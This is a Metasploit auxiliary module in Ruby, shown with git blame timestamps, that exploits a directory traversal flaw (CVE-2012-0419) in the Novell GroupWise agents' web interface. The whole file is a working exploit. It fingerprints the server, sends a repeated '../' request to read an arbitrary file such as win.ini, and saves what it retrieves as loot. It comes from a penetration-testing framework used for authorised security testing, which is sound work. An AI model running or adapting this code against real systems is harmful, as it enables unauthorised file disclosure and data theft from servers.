metasploit-framework/modules/auxiliary/scanner/http/groupwise_agents_http_trave...

90 lines
2.4 KiB
Ruby
Raw Normal View History

2013-02-07 20:15:49 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-02-07 20:15:49 +00:00
##
require 'msf/core'
2016-03-07 08:56:58 +00:00
class Metasploit < Msf::Auxiliary
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell Groupwise Agents HTTP Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in Novell Groupwise.
The vulnerability exists in the web interface of both the Post Office and the
MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2
over Windows 2003 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'r () b13$', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-0419' ],
[ 'OSVDB', '85801' ],
[ 'BID', '55648' ],
[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7010772' ]
]
))
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(7181), # Also 7180 can be used
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
2013-08-30 21:28:54 +00:00
OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 10])
], self.class)
end
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
def is_groupwise?
res = send_request_raw({'uri'=>'/'})
if res and res.headers['Server'].to_s =~ /GroupWise/
return true
else
return false
end
end
2013-02-07 21:05:39 +00:00
2013-08-30 21:28:54 +00:00
def run_host(ip)
2013-02-07 21:05:39 +00:00
2013-08-30 21:28:54 +00:00
if not is_groupwise?
vprint_error("#{rhost}:#{rport} - This isn't a GroupWise Agent HTTP Interface")
return
end
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
travs = ""
travs << "../" * datastore['DEPTH']
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
travs = normalize_uri("/help/", travs, datastore['FILEPATH'])
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
vprint_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => travs,
'method' => 'GET',
})
2013-02-07 20:15:49 +00:00
2013-08-30 21:28:54 +00:00
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'novell.groupwise',
'application/octet-stream',
ip,
contents,
fname
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
else
vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
2013-02-07 20:15:49 +00:00
end